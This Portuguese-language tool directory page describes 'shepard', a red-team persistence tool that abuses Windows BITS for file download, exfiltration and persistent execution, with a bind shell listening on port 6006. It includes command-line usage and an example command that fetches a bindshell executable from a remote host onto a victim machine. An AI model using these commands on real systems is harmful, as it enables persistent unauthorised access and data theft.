Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
shepard — Ferramenta persistente de download/upload/execução em andamento usando o Windows BITS. | Kitploit
Ferramentas/GitHubGitHub/d3adzo/shepard
Mecanismos de PersistênciaExfiltração de DadosPós-ExploraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubd3adzo/shepard

shepard

Ferramenta persistente de download/upload/execução em andamento usando o Windows BITS.

Ver Repositório
413há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SHEPARD

BITS

Esta é uma ferramenta de persistência que usa o Windows Background Intelligent Transfer Service (BITS).

Funcionalidade

Download de arquivos, Exfiltração de arquivos, Download de arquivos + Execução persistente

Uso

Execute shepard.exe como Administrador com os seguintes argumentos de linha de comando:

-d <remoteLocation> <writePath> : download de arquivo comum para um caminho local de sua escolha

-e <remoteLocation> <localPath> : upload de arquivo comum a partir de um caminho local de sua escolha (envia apenas para servidor IIS, esta é uma limitação do BITS)

-dr <remoteLocation> <writePath> [optionalFileArgs] : download de arquivo para um caminho de sua escolha e tentará manter a persistência. O arquivo baixado tentará executar com optionalFileArgs e o BITS verificará a cada 30 segundos para garantir que o arquivo ainda está em execução no sistema comprometido.

Executar este executável sem argumentos ou com uma quantidade incorreta de argumentos fará com que shepard saia de forma limpa.

BINDSHELL

O servidor (vítima) é escrito em C#. Ele escuta na porta 6006.

Uso da vítima

Execute shepardsbind_serv.exe sem argumentos.

O cliente (atacante) é escrito em Python e recebe um argumento: o endereço IP da máquina da vítima.

Uso do servidor

shepardsbind_recv.py <victim's IP>

Executar shepardsbind_recv.py sem argumentos retornará um erro.

Usando-os em conjunto

O único executável que deve estar na máquina da vítima é o shepard.exe. Hospede o executável do bindshell de download em um local publicamente acessível. O Shepard baixará e executará o executável do bindshell, e o usuário agora pode usar o receptor python. Se o shell for encontrado e morto, ele reiniciará após 30 segundos.

Exemplo: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe

Baixar ferramenta